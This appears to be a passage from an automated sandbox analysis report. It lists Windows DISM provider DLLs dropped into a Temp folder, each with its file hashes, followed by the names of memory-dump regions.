| SHA1 | fb84756d11bfd638c4b49268b96d0007b26ba2fb |
| SHA256 | 4ccfe7883bce7785b1387ad3872230159899a5337d30a2f81a937b74bcbc4ce5 |
| SHA512 | af0a2a3f813e1adfff972285c9655f50ce6916caaeff5cb82f6c7d76491ffc9b365a47f19750fc02d7122182bf65aae79ed167886c33f202d5a781ab83d75662 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\IBSProvider.dll
| MD5 | 120f0a2022f423fc9aadb630250f52c4 |
| SHA1 | 826df2b752c4f1bba60a77e2b2cf908dd01d3cf7 |
| SHA256 | 5425382aaa32ffc133adb6458ff516db0e2ad60fac52dd595d53c370f4ba6fa0 |
| SHA512 | 23e50735c06cef93d11873fc8e5e29fc63dcf3f01dc56822a17c11ca57bbfb10d46fac6351f84ba30050a16d6bd0744a08a4042a9743a6df87ac8a12e81e2764 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\GenericProvider.dll.mui
| MD5 | d6b02daf9583f640269b4d8b8496a5dd |
| SHA1 | e3bc2acd8e6a73b6530bc201902ab714e34b3182 |
| SHA256 | 9102fa05ed98d902bf6e95b74fdbb745399d4ce4536a29607b2156a0edfeddf0 |
| SHA512 | 189e87fcc2902e2a8e59773783d80a7d4dd5d2991bd291b0976cbd304f78bd225b353703735b84de41b5f59c37402db634c4acc805d73176cde75ca662efff50 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\FolderProvider.dll.mui
| MD5 | 22b4a3a1ec3b6d7aa3bc61d0812dc85f |
| SHA1 | 97ae3504a29eb555632d124022d8406fc5b6f662 |
| SHA256 | c81a992ecebd9260ff34e41383aaca1c64a9fa4706a4744ac814f0f5daa1e105 |
| SHA512 | 9329b60a60c45b2486000ed0aff8d260fdac3d0a8789823eaa015eab1a6d577012f9d12502f81bad9902e41545c3c3e77f434bc1a753b4f8430d01db2cdbe26c |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\FolderProvider.dll
| MD5 | 4f3250ecb7a170a5eb18295aa768702d |
| SHA1 | 70eb14976ddab023f85bc778621ade1d4b5f4d9d |
| SHA256 | a235317ab7ed89e6530844a78b933d50f6f48ea5df481de158eb99dd8c4ba461 |
| SHA512 | e9ce6cced5029d931d82e78e7e609a892bfe239096b55062b78e8ff38cce34ce6dd4e91efb41c4cd6ecf6017d098e4c9b13d6cb4408d761051468ee7f74bc569 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\FfuProvider.dll.mui
| MD5 | dc826a9cb121e2142b670d0b10022e22 |
| SHA1 | b2fe459ede8ba99602ae6ea5fa24f0133cca2bc9 |
| SHA256 | ba6695148f96a5d45224324006ae29becfd2a6aa1de947e27371a4eb84e7451a |
| SHA512 | 038e9abff445848c882a71836574df0394e73690bc72642c2aa949c1ad820c5cbb4dedc4ee7b5b75fd5ac8a43813d416f23d28973de7a7f0e5c3f7112da6fe1b |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\DmiProvider.dll.mui
| MD5 | b7252234aa43b7295bb62336adc1b85c |
| SHA1 | b2c42a5af79530e7cf9bcf54fd76ae9d5f234d7f |
| SHA256 | 73709c25dc5300a435e53df97fc01a7dc184b56796cae48ee728d54d26076d6c |
| SHA512 | 88241009b342eb1205b10f7725a7cb1ec2c7135606459d038c4b8847efd9d5e0ad4749621f8df93746dd3ba8ab92d1b0f513ed10e2ba712a7991716f4c062358 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\DismCore.dll
| MD5 | b1f793773dc727b4af1648d6d61f5602 |
| SHA1 | be7ed4e121c39989f2fb343558171ef8b5f7af68 |
| SHA256 | af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e |
| SHA512 | 66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\CbsProvider.dll.mui
| MD5 | 6c51a3187d2464c48cc8550b141e25c5 |
| SHA1 | a42e5ae0a3090b5ab4376058e506b111405d5508 |
| SHA256 | d7a0253d6586e7bbfb0acb6facd9a326b32ba1642b458f5b5ed27feccb4fc199 |
| SHA512 | 87a9e997d55bc6dbd05af1291fb78cd02266641d018ccfeb6826cb0de205aaf8a57b49e587462dbb6df2b86b54f91c0c5d3f87e64d7dbb2aea75ef143c5447ba |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\AssocProvider.dll.mui
| MD5 | 8833761572f0964bdc1bea6e1667f458 |
| SHA1 | 166260a12c3399a9aa298932862569756b4ecc45 |
| SHA256 | b18c6ce1558c9ef6942a3bce246a46557c2a7d12aec6c4a07e4fa84dd5c422f5 |
| SHA512 | 2a907354ec9a1920b9d1d2aeb9ff7c7314854b36a27f7d88aca17825e74a87413dbe7d1c3fde6a2410b5934f8c80a76f8bb6b7f12e7cfc643ce6622ca516d9b8 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\AssocProvider.dll
| MD5 | 94dc379aa020d365ea5a32c4fab7f6a3 |
| SHA1 | 7270573fd7df3f3c996a772f85915e5982ad30a1 |
| SHA256 | dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907 |
| SHA512 | 998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\AppxProvider.dll.mui
| MD5 | bd0dd9c5a602cb0ad7eabc16b3c1abfc |
| SHA1 | cede6e6a55d972c22da4bc9e0389759690e6b37f |
| SHA256 | 8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3 |
| SHA512 | 86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\AppxProvider.dll
| MD5 | a7927846f2bd5e6ab6159fbe762990b1 |
| SHA1 | 8e3b40c0783cc88765bbc02ccc781960e4592f3f |
| SHA256 | 913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f |
| SHA512 | 1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
memory/4428-264-0x0000000073570000-0x00000000735A9000-memory.dmp
memory/4428-265-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-266-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4696-267-0x0000000000400000-0x000000000043D000-memory.dmp
memory/4428-268-0x0000000074A80000-0x0000000074AB9000-memory.dmp
memory/4428-269-0x0000000073570000-0x00000000735A9000-memory.dmp
memory/4428-270-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-271-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-272-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-273-0x0000000073210000-0x0000000073249000-memory.dmp